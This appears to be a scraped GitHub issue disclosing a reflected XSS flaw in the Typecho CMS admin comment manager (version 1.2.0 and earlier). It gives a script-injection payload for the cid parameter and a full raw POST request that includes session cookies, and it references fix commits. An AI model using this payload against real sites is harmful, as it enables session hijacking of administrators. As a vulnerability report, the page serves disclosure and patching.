Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Typecho <= 1.2.0
Typecho admin backend comment manager with refleted-XSS vulnerability..
/admin/manage-comments.php
cid
POST /admin/manage-comments.php with:
coid[]=1&cid="><script>alert(1)</script><!--
The full POC request:
POST /cms/typecho/admin/manage-comments.php?status=wating&category=&keywords=abc&__typecho_all_posts=off&uid= HTTP/1.1 Host: 192.168.0.10 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Referer: http://192.168.0.10/cms/typecho/admin/login.php?referer=http%3A%2F%2F192.168.0.10%2Fcms%2Ftypecho%2Fadmin%2Fmanage-comments.php Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Cookie: 745020ecd4b17dde48d43755702a78b4__typecho_uid=1; 745020ecd4b17dde48d43755702a78b4__typecho_authCode=%24T%249aGUcl7K02f405471bbdacf65892bf8ffb75bc211; PHPSESSID=m7h7isuus6cugk6mb58vdah296; u5DD_2132_saltkey=ql9191Ym; u5DD_2132_lastvisit=1677486351; u5DD_2132_seccodecSASGLE52ETX=1.1b4fba6d0be0f7dce2; u5DD_2132_ulastactivity=dd6b5bfUH2dwkFNJ5HnOvs2bnRKl16bY2TMsiYWsOsPOeru7pyMl; u5DD_2132_auth=ade9wjKb33QiAdI8RrnDloFyK4vB8ca3sx7pIgT0BNlWPo1CeA%2Bsk87ST8rZ%2FVqZTdeIhOInVMfZCF8zm7uu; u5DD_2132_lastcheckfeed=1%7C1677489964; u5DD_2132_nofavfid=1; u5DD_2132_home_diymode=1; u5DD_2132_visitedfid=2; u5DD_2132_smile=1D1; u5DD_2132_home_readfeed=1677497943; u5DD_2132_forum_lastvisit=D_2_1677498054; u5DD_2132_st_t=1%7C1677498055%7C9149ebde1ec47006277ae3faf93f0e2f; u5DD_2132_editormode_e=1; u5DD_2132_st_p=1%7C1677498095%7C926ebc78300a154f5ad9ebb023eb0b77; u5DD_2132_viewid=tid_1; u5DD_2132_seccode=5.792e3c6d8b004d4403; u5DD_2132_seccodecSE52ETX=6.a73b7daa353701b59a Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 44 coid[]=1&cid="><script>alert(1)</script><!--
Reported by Srpopty, vulnerability discovered by using Corax.
The text was updated successfully, but these errors were encountered:
a609b14
Merge pull request #24 from typecho/master
665320f
fix typecho#1539
No branches or pull requests
Typecho <= 1.2.0 Comment Manager with Refleted-XSS Vulnerability
Influenced Version
Typecho <= 1.2.0
Description
Typecho admin backend comment manager with refleted-XSS vulnerability..
/admin/manage-comments.php, the unfiltered request parametercidis directly echoed to html.POC
POST
/admin/manage-comments.phpwith:The full POC request:
The text was updated successfully, but these errors were encountered: